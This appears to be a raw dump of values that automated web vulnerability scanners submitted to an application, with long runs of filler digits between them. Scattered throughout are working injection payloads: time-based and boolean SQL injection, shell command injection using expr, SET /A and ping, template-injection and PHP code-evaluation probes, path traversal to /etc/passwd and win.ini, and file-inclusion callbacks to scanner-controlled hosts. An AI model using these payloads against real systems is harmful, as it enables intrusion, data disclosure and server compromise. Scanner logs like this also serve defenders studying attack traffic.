<% response.write(268409241-7395) %>
3
3
3
<% response.write(268409241-22159) %>
3
3
"+response.write(268409241-87282)+"
3
3
3
"+response.write(268409241-49091)+"
3
3
+response.write(268409241-53778)'
3
3
3
+response.write(268409241-44621)'
3
3
response.write(268409241-57489)'
3
3
3
response.write(268409241-77334)'
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
|expr${IFS}268409241${IFS}-${IFS}88445
3
3
3
3
|expr${IFS}268409241${IFS}-${IFS}56435
3
3
3
3
3
3
3
3
3
expr 268409241 - 52778
3
3
3
expr 268409241 - 74008
3
3
expr 268409241 - 37906;
3
3
3
3
expr 268409241 - 63300;
3
3
1;expr 268409241 - 97309;x
3
3
3
1;expr 268409241 - 99123;x
3
3
1';expr 268409241 - 59036;'
3
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
1';expr 268409241 - 55241;'
3
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
1";expr 268409241 - 92437;"
3
3
3
1";expr 268409241 - 13429;"
3
3
| SET /A 0xFFF9999-13580
3
3
3
| SET /A 0xFFF9999-23097
3
3
SET /A 0xFFF9999-20927
3
3
3
SET /A 0xFFF9999-46603
3
3
SET /A 0xFFF9999-77376 &
3
3
3
SET /A 0xFFF9999-99543 &
3
& SET /A 0xFFF9999-12431 &
3
{{ 268409241- 38568 }}
3
3
3
& SET /A 0xFFF9999-63240 &
ieliiwtm2hjnhoy0yxg-nwg9gu5cwqn7syezz8dtqgf.r87.me/p/
{{ 268409241- 9451 }}
3
'+NSFTW+'
3
ieliiwtm2hf9tbtpjor6yaya2sxj2sbfyc5huhvikzb.r87.me/p/
(268409241-35303)
'& SET /A 0xFFF9999-52372 &
3
3
3
3
3
'+NSFTW+'
php://filter//resource=http://ieliiwtm2hul51vkjdvkbpdpikfb_w5p0bbui1bwbfr.r87.me/p/
(268409241-48183)
'& SET /A 0xFFF9999-17165 &
|ping -n 25 127.0.0.1
3
NSFTW
3
php://filter//resource=http://ieliiwtm2hk4-xw0kzmkxmaab3ekbunhgrai0w_nvs3.r87.me/p/
{{ 268409241- 78774 }}
"& SET /A 0xFFF9999-9844 &
3
3
|ping -n 25 127.0.0.1
http://ieliiwtm2hz-hnl6r-kgdq9wygo5l3uw_zlpevpcc-7.r87.me/p/
NSFTW
{{ 268409241- 99300 }}
"& SET /A 0xFFF9999-31633 &
http://ieliiwtm2hrjp2kicxnne044apfmafgddctysdlidir.r87.me/p/
ping -w 25 127.0.0.1
3
3
@(268409241-76500)
3
3
3
3
ping -w 25 127.0.0.1
3
http://r87.me/r/?id=ieliiwtm2hareczhszd7srbocrgf-wsgexdkh3mekqk
@(268409241-99407)
3
3
ping -n 25 127.0.0.1
http://r87.me/r/?id=ieliiwtm2h8grfevzsu3x45ni1qoxxq2kjhofn5pfx4
3
<%= "#{268409241-4100}" %>
3
3
3
3
3
ping -n 25 127.0.0.1
3
//ieliiwtm2hqnxmepwsnp19oxgwjf5lowf141nd1ulxe.r87.me
<%= "#{268409241-43022}" %>
3
ping -w 25 127.0.0.1 &
//ieliiwtm2ho-4n6b6trl_c6iffc6eyi6gyobo0teftq.r87.me
3
<#assign x=268409241 - 60109> ${x?string["0"]}
3
3
3
3
3
ping -w 25 127.0.0.1 &
3
ieliiwtm2hl0nll_7yv7rxdje1wih1q1voialysjlng.r87.me
<#assign x=268409241 - 56820> ${x?string["0"]}
3
&ping -w 25 127.0.0.1 &
3
<%- 268409241-62842 %>
3
ieliiwtm2hs7p-uzr74utfp-ezxpwz8uzglbuyynwwm.r87.me
3
3
3
3
3
&ping -w 25 127.0.0.1 &
<%- 268409241-95318 %>
3
3
3
'&ping -w 25 127.0.0.1 &'
=268409241-69890
3
3
3
3
3
3
=268409241-38306
3
'&ping -w 25 127.0.0.1 &'
3
3
3
{{268409241-71516}}
"&ping -w 25 127.0.0.1 &"
3
&thisdoesntexists;
3
3
3
{{268409241-75028}}
3
"&ping -w 25 127.0.0.1 &"
3
3
&thisdoesntexists;
3
3
ping -n 25 127.0.0.1 &
3
3
3
3
ping -n 25 127.0.0.1 &
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
3
3
3
3
3
& ping -n 25 127.0.0.1 &
3
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3
3
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
& ping -n 25 127.0.0.1 &
3
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3
'& ping -n 25 127.0.0.1 &
3
3
3
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
'& ping -n 25 127.0.0.1 &
3
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3
"& ping -n 25 127.0.0.1 &
3
3
3
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
"& ping -n 25 127.0.0.1 &
3
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
3
3
3
3
3
3
%27
3
3
3
%27
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
NS09?s1?DBL?SNGL?NS09
3
3
3
3
3
NS09?s1?DBL?SNGL?NS09
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
N3tSp4rK3R
3
3
3
3
N3tSp4rK3R
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
r87.com/n
3
3
3
3
3
r87.com/n
3
3
3
3
#{28275*28275-(63152)}
php://filter//resource=http://r87.com/n?.aspx
3
3
3
3
#{28275*28275-(51050)}
3
php://filter//resource=http://r87.com/n?.aspx
3
3
3
3
${28275*28275-(42421)}
3
3
3
3
http://r87.com/n?.aspx
3
3
3
${28275*28275-(83667)}
3
3
http://r87.com/n?.aspx
ns:netsparker056650=vuln
3
-1" OR 1=1 OR "1"="1
3
3
http://r87.com/n?.aspx
ns:netsparker056650=vuln
-1" OR 1=1 OR "1"="1
3
3
3
ns:netsparker056650=vuln
http://r87.com/n?.aspx
3
-1' OR 1=1 OR '1'='1
3
3
ns:netsparker056650=vuln
-1' OR 1=1 OR '1'='1
hTTp://r87.com/n
3
3
3
http://example.com/? ns: netsparker056650=vuln
-1 OR X='ss
hTTp://r87.com/n
3
3
3
3
http://example.com/? ns: netsparker056650=vuln
-1 OR 17-7=10
3
3
3
-1" OR 1=1 OR "ns"="ns
ns:netsparker056650=vuln
3
3
3
3
3
-1' OR 1=1 OR 'ns'='ns
ns:netsparker056650=vuln
3
3
3
-1 AND 'NS='ss
3
3
3
3
3
NS-1NO
3
3
3
'
3
3
3
3
-1 OR 1=1
3
3
3
3
-1 OR 1=1
3
3
3
3
-1 OR 1=1
3
3
3
3
3
-1 OR 1=1
3
3
3
-1" OR 1=1 OR "1"="1
3
3
3
3
3
3
-1" OR 1=1 OR "1"="1
3
3
3
-1' OR 1=1 OR '1'='1
3
3
3
3
3
3
3
-1' OR 1=1 OR '1'='1
3
3
3
-1 OR X='ss
3
3
3
3
3
-1 OR 17-7=10
3
3
3
-1" OR 1=1 OR "ns"="ns
3
3
3
-1' OR 1=1 OR 'ns'='ns
3
3
3
3
3
3
-1 AND 'NS='ss
3
3
NS-1NO
3
3
3
3
3
'
3
3
-1 OR 1=1
3
3
3
3
3
3
-1 OR 1=1
3
3
-1 OR 1=1
3
3
3
3
3
3
-1 OR 1=1
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
@@vH0Nq
1����%2527%2522
1'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
1
1
1
1
1
1
nrYsZirg')) OR 336=(SELECT 336 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
FRDsplGY') OR 870=(SELECT 870 FROM PG_SLEEP(15))--
1
1
1
1
1
1
1
1
wnZCoJht' OR 246=(SELECT 246 FROM PG_SLEEP(15))--
1
1
1
1
1
1
-1)) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
1
1
@@HTRvd
-5) OR 419=(SELECT 419 FROM PG_SLEEP(15))--
1����%2527%2522
1'"
@@mNBjl
1����%2527%2522
1'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
-5 OR 463=(SELECT 463 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
qtspSjUf'; waitfor delay '0:0:15' --
wTLdjIVE')) OR 689=(SELECT 689 FROM PG_SLEEP(15))--
HqvNSABZ')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
1
1 waitfor delay '0:0:15' --
N8i0Gm9P') OR 371=(SELECT 371 FROM PG_SLEEP(15))--
E0k2eZG0') OR 221=(SELECT 221 FROM PG_SLEEP(15))--
1
-1); waitfor delay '0:0:15' --
kdLpeqMj' OR 963=(SELECT 963 FROM PG_SLEEP(15))--
r1PIiotA' OR 315=(SELECT 315 FROM PG_SLEEP(15))--
1
-1; waitfor delay '0:0:15' --
-1)) OR 755=(SELECT 755 FROM PG_SLEEP(15))--
-1)) OR 833=(SELECT 833 FROM PG_SLEEP(15))--
1
-5) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
-5) OR 743=(SELECT 743 FROM PG_SLEEP(15))--
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-5 OR 689=(SELECT 689 FROM PG_SLEEP(15))--
-5 OR 464=(SELECT 464 FROM PG_SLEEP(15))--
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
SNbN5X1k'; waitfor delay '0:0:15' --
xJAAQB3H'; waitfor delay '0:0:15' --
1
if(now()=sysdate(),sleep(15),0)
1 waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
1
-1" OR 2+809-809-1=0+0+0+1 --
-1' OR 2+981-981-1=0+0+0+1 or '6DlWTfoD'='
-1' OR 2+55-55-1=0+0+0+1 --
-1 OR 2+183-183-1=0+0+0+1
-1 OR 2+32-32-1=0+0+0+1 --
ZjKa8YZy
-1); waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1
1
-1; waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
1
1
1
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
1
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
1
1
1
1
1
if(now()=sysdate(),sleep(15),0)
if(now()=sysdate(),sleep(15),0)
1
1
-1" OR 2+708-708-1=0+0+0+1 --
-1' OR 2+374-374-1=0+0+0+1 or '9OPia3wV'='
-1' OR 2+583-583-1=0+0+0+1 --
-1 OR 2+508-508-1=0+0+0+1
-1 OR 2+734-734-1=0+0+0+1 --
frsgEwYm
-1" OR 2+608-608-1=0+0+0+1 --
-1' OR 2+590-590-1=0+0+0+1 or 'yWBe7YaN'='
1
-1' OR 2+714-714-1=0+0+0+1 --
-1 OR 2+508-508-1=0+0+0+1
-1 OR 2+861-861-1=0+0+0+1 --
1LO0an87
1
1
1
1
@@x3V5E
1����%2527%2522
1'"
-1" OR 2+632-632-1=0+0+0+1 --
-1' OR 2+658-658-1=0+0+0+1 or 'oVbXGqXB'='
-1' OR 2+779-779-1=0+0+0+1 --
-1 OR 2+429-429-1=0+0+0+1
-1 OR 2+645-645-1=0+0+0+1 --
FiUssfwd
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
@@uYRsw
1����%2527%2522\'\"
1'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
@@CK8Ud
1����%2527%2522\'\"
1'"
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1DLmiaTn9')) OR 189=(SELECT 189 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1MOT6CQ6I') OR 509=(SELECT 509 FROM PG_SLEEP(15))--
1vuooIBtL')) OR 555=(SELECT 555 FROM PG_SLEEP(15))--
@@lik7X
1����%2527%2522\'\"
1'"
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1Cr50BZt2' OR 180=(SELECT 180 FROM PG_SLEEP(15))--
1IqsdQd6n') OR 896=(SELECT 896 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1-1)) OR 260=(SELECT 260 FROM PG_SLEEP(15))--
1p6CBC7oe' OR 588=(SELECT 588 FROM PG_SLEEP(15))--
1RtNQyDun')) OR 901=(SELECT 901 FROM PG_SLEEP(15))--
1-1) OR 519=(SELECT 519 FROM PG_SLEEP(15))--
1-1)) OR 852=(SELECT 852 FROM PG_SLEEP(15))--
1lcFFt3jh') OR 915=(SELECT 915 FROM PG_SLEEP(15))--
1-1 OR 910=(SELECT 910 FROM PG_SLEEP(15))--
1-1) OR 932=(SELECT 932 FROM PG_SLEEP(15))--
1W038l5c6' OR 996=(SELECT 996 FROM PG_SLEEP(15))--
1mmD3UNxP'; waitfor delay '0:0:15' --
1-1 OR 775=(SELECT 775 FROM PG_SLEEP(15))--
1-1)) OR 909=(SELECT 909 FROM PG_SLEEP(15))--
1-1 waitfor delay '0:0:15' --
17tDiTUsF'; waitfor delay '0:0:15' --
1-1) OR 18=(SELECT 18 FROM PG_SLEEP(15))--
1-1); waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1-1 OR 69=(SELECT 69 FROM PG_SLEEP(15))--
1-1; waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1kvevqxVb'; waitfor delay '0:0:15' --
1-1; waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
1-1); waitfor delay '0:0:15' --
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
1-1; waitfor delay '0:0:15' --
1*if(now()=sysdate(),sleep(15),0)
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
-1" OR 2+925-925-1=0+0+0+1 --
1*if(now()=sysdate(),sleep(15),0)
-1' OR 2+187-187-1=0+0+0+1 or 'Da9zx7ub'='
-1' OR 2+693-693-1=0+0+0+1 --
-1 OR 2+306-306-1=0+0+0+1
-1 OR 2+350-350-1=0+0+0+1 --
1
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
-1" OR 2+656-656-1=0+0+0+1 --
-1' OR 2+741-741-1=0+0+0+1 or 'VnrimYXL'='
1bnMHCMqM
-1' OR 2+187-187-1=0+0+0+1 --
-1 OR 2+949-949-1=0+0+0+1
-1 OR 2+856-856-1=0+0+0+1 --
1
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
1
1WKSK7vhk
1*if(now()=sysdate(),sleep(15),0)
1
1
-1" OR 2+391-391-1=0+0+0+1 --
-1' OR 2+229-229-1=0+0+0+1 or 'OC9YX5VZ'='
-1' OR 2+531-531-1=0+0+0+1 --
-1 OR 2+190-190-1=0+0+0+1
-1 OR 2+607-607-1=0+0+0+1 --
1
1
1
1
1
1
1XszRG08S
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
19672637
19672637
1
1
19672637
19672637
1
19672637
19672637
19672637
1
1
19672637
19672637
19672637
19672637
1
1
1
1
1
../1
1
file:///etc/passwd
../../../../../../../../../../../../../../windows/win.ini
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'.print(md5(31337)).'
1
1
1
1
1
1
1
${@print(md5(31337))}\
1
1
1
1
1
1
1
1
1
${@print(md5(31337))}
1
1
1"||sleep(27*1000)*ectjso||"
1
";print(md5(31337));$a="
1
1
1
1
1
1
1
1
';print(md5(31337));$a='
1
1
1
1
1
1
1
1'||sleep(27*1000)*obgtwp||'
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1"&&sleep(27*1000)*fguvqc&&"
1
1
../1
1
1
1
1'&&sleep(27*1000)*ymzdwn&&'
1
1
1
1
1
1
1
1
'"()
file:///etc/passwd
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../windows/win.ini
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
../1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
file:///etc/passwd
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../windows/win.ini
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
1
'"
1
1
1
1
1
1
1
1
1
1
19398697
1
1
19398697
1
1
19398697
1
19398697
1
1
1
1
19398697
1
1
1
1
1
1
1
1
19398697
1
1
1
1
1
19398697
1
1
xfs.bxss.me
19398697
1
1
1
1
1
1
1
19398697
1
bxss.me
1
19398697
1
1
1
1
19398697
1
1
1
1
1
1
c:/windows/win.ini
1
1
bxss.me/t/xss.html?%00
1
/etc/shells
1
1
1
1
1
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
HttP://bxss.me/t/xss.html?%00
1
1
Http://bxss.me/t/fit.txt
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
1
1
1
1
1
1
1
1
1
1
1
1
1
'.print(md5(31337)).'
1
1
1
1
1
"+response.write(9841190*9231051)+"
1
1
1
1
^(#$!@#$)(()))******
'+response.write(9841190*9231051)+'
1
${@print(md5(31337))}\
1
1
1
!(()&&!|*|*|
1
1
1
1
${@print(md5(31337))}
1
1
1
1
)
1
1
";print(md5(31337));$a="
1
1
1
1
1
1
response.write(9841190*9231051)
1
';print(md5(31337));$a='
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1"||sleep(27*1000)*xjqada||"
1
1
1
1
1
1
1
1'||sleep(27*1000)*zrrtun||'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1"&&sleep(27*1000)*ekbmnr&&"
1
1
1
1
1
1
1
1
1'&&sleep(27*1000)*wdtmpe&&'
1
1
1
1
'"()
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
${10000028+10000065}
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
'"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
bxss.me
1
1
1
1
1
c:/windows/win.ini
1
1
1
1
1
1
1
1
1
/etc/shells
1
1
1
1
1
1
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
1
1
1
1
1
1
1
1
1
1
1
1
Http://bxss.me/t/fit.txt
1
"+response.write(9016526*9605159)+"
1
1
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
bxss.me/t/xss.html?%00
1
1
1
1
1
1
1
HttP://bxss.me/t/xss.html?%00
1
1
1
1
1
1
'+response.write(9016526*9605159)+'
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
1
1
1
response.write(9016526*9605159)
1
1
1
1
1
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
1
1
1
1
1
1
1
1
1
1
xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1"||sleep(27*1000)*vgcnhe||"
1
1
1
1
1
1
1
1
1'||sleep(27*1000)*fzknbz||'
'.print(md5(31337)).'
1
1
1
1
1
1
1
1
1"&&sleep(27*1000)*kdfnci&&"
1
1
1
1
1
${@print(md5(31337))}\
1'&&sleep(27*1000)*jnjgkr&&'
^(#$!@#$)(()))******
1
1
1
1
${@print(md5(31337))}
1
1
'"()
1
1
";print(md5(31337));$a="
1
1
1
1
1
1
';print(md5(31337));$a='
1
!(()&&!|*|*|
1
1
1
19776520
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
19776520
19776520
19776520
19776520
1
1
)
1
1
1
19776520
1
1
19776520
1
1
1
1
1
1
1
1
1
1
1
1
1
19776520
1
1
1
1
1
1
19776520
19776520
${9999071+9999908}
1
1
1
1
1
1
1
1
19776520
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
bxss.me
1
c:/windows/win.ini
1
1
1
1
1
1
1
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
'"
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
1
1
1
1
'+response.write(9143707*9798153)+'
1
1
bxss.me/t/xss.html?%00
response.write(9143707*9798153)
1
xfs.bxss.me
)
1
1
1
1
1
1
1
1
1
1
1
1